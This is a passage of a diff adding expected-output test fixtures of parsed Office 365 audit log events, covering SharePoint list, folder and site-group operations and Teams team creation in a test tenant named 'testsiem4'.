"user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "073f437c-2e04-441a-05ad-08d8c9b59380", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 16107, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "073f437c-2e04-441a-05ad-08d8c9b59380", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/0c5e0085-eb30-494b-9cdd-ece1d3c649a2", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "8f586afb-1438-475e-a4d5-08d8c9b5937d", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 17198, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "8f586afb-1438-475e-a4d5-08d8c9b5937d", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/39360f11-34cf-4356-9945-25c44e68dade", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:00.000Z", + "event.action": "added-group-account-to", + "event.category": "iam", + "event.code": "MicrosoftTeams", + "event.dataset": "o365.audit", + "event.id": "9b9e973b-64c3-4607-bc79-bf743c985051", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "MicrosoftTeams", + "event.type": [ + "group", + "creation" + ], + "fileset.name": "audit", + "group.name": "users", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 18289, + "o365.audit.CreationTime": "2021-02-05T09:08:00", + "o365.audit.Id": "9b9e973b-64c3-4607-bc79-bf743c985051", + "o365.audit.Operation": "TeamCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 25, + "o365.audit.TeamGuid": "19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2", + "o365.audit.TeamName": "users", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 2, + "o365.audit.Version": 1, + "o365.audit.Workload": "MicrosoftTeams", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "root", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root" + }, + { + "@timestamp": "2021-02-05T09:07:58.000Z", + "event.action": "added-users-to-group", + "event.category": "iam", + "event.code": "MicrosoftTeams", + "event.dataset": "o365.audit", + "event.id": "f16cc0cc-2a18-580e-83c5-04d3c385ebb8", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "MicrosoftTeams", + "event.type": [ + "group", + "change" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 18695, + "o365.audit.AADGroupId": "61b6d6f5-7aa0-437b-a967-fbcd39ec90a1", + "o365.audit.CommunicationType": "Team", + "o365.audit.CreationTime": "2021-02-05T09:07:58", + "o365.audit.Id": "f16cc0cc-2a18-580e-83c5-04d3c385ebb8", + "o365.audit.ItemName": "users", + "o365.audit.Members": [ + { + "DisplayName": "Adrian Serrano", + "Role": 2, + "UPN": "admin@testsiem4.onmicrosoft.com" + }, + { + "DisplayName": "Eve", + "Role": 2, + "UPN": "eve@testsiem4.onmicrosoft.com" + } + ], + "o365.audit.Operation": "MemberAdded", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 25, + "o365.audit.TeamGuid": "19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2", + "o365.audit.TeamName": "users", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "MicrosoftTeams", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": [ + "admin@testsiem4.onmicrosoft.com", + "eve@testsiem4.onmicrosoft.com", + "root" + ], + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root" + }, + { + "@timestamp": "2021-02-05T09:08:13.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "6454a7d9-afae-4a6c-ffa5-08d8c9b5911c", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 19362, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-5054-2000-9ced-83aa1cf560fd", + "o365.audit.CreationTime": "2021-02-05T09:08:13", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "6454a7d9-afae-4a6c-ffa5-08d8c9b5911c", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:12.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "FolderCreated", + "event.category": "file", + "event.code": "SharePointFileOperation", + "event.dataset": "o365.audit", + "event.id": "6d69552c-2019-4f7c-92bc-08d8c9b5908b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "creation", + "file.directory": "Shared Documents", + "file.extension": "", + "file.name": "General", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 20481, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-b01b-2000-9ced-879789d2d8e5", + "o365.audit.CreationTime": "2021-02-05T09:08:12", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "6d69552c-2019-4f7c-92bc-08d8c9b5908b", + "o365.audit.ItemType": "Folder", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListItemUniqueId": "81d4cd08-7ffb-45d2-a422-86a9a9335d66", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/Shared Documents/General", + "o365.audit.Operation": "FolderCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 6, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users/", + "o365.audit.SourceFileExtension": "", + "o365.audit.SourceFileName": "General", + "o365.audit.SourceRelativeUrl": "Shared Documents", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "url.original": "https://testsiem4.sharepoint.com/sites/users/Shared Documents/General", + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:07:57.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "6e9fc7e0-158a-4456-2a89-08d8c9b58771", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 21523, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:57", + "o365.audit.EventData": "Site Members", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "6e9fc7e0-158a-4456-2a89-08d8c9b58771", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "Everyone except external users", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "a9b8277d-d3b9-4d99-0491-08d8c9b5874b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 22335, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "a9b8277d-d3b9-4d99-0491-08d8c9b5874b", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "dfef0880-e895-47e1-2e39-08d8c9b58733", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 23127, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "dfef0880-e895-47e1-2e39-08d8c9b58733", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users Owners", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "d9b6f410-30c7-42a0-0820-08d8c9b5872c", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 23920, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Members", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "d9b6f410-30c7-42a0-0820-08d8c9b5872c", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users Members", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "5c82c14e-525e-44f4-7cd7-08d8c9b58722", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 24715, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "5c82c14e-525e-44f4-7cd7-08d8c9b58722", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "client.address": "20.190.143.50", + "client.ip": "20.190.143.50", + "event.action": "SiteCollectionCreated", + "event.category": "web", + "event.code": "SharePoint", + "event.dataset": "o365.audit", + "event.id": "f576a30e-1734-4f42-f3b3-08d8c9b58718", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 25507, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Graph", + "o365.audit.ApplicationId": "00000006-0000-0ff1-ce00-000000000000", + "o365.audit.ClientIP": "20.190.143.50", + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "O365AdminCenterTrueFalse", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "f576a30e-1734-4f42-f3b3-08d8c9b58718", + "o365.audit.ItemType": "Site", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "SiteCollectionCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 4, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "20.190.143.50", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "20.190.143.50", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "f84f38b0-1963-4a1d-454e-08d8c9b586e9", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 26436, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "f84f38b0-1963-4a1d-454e-08d8c9b586e9", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users 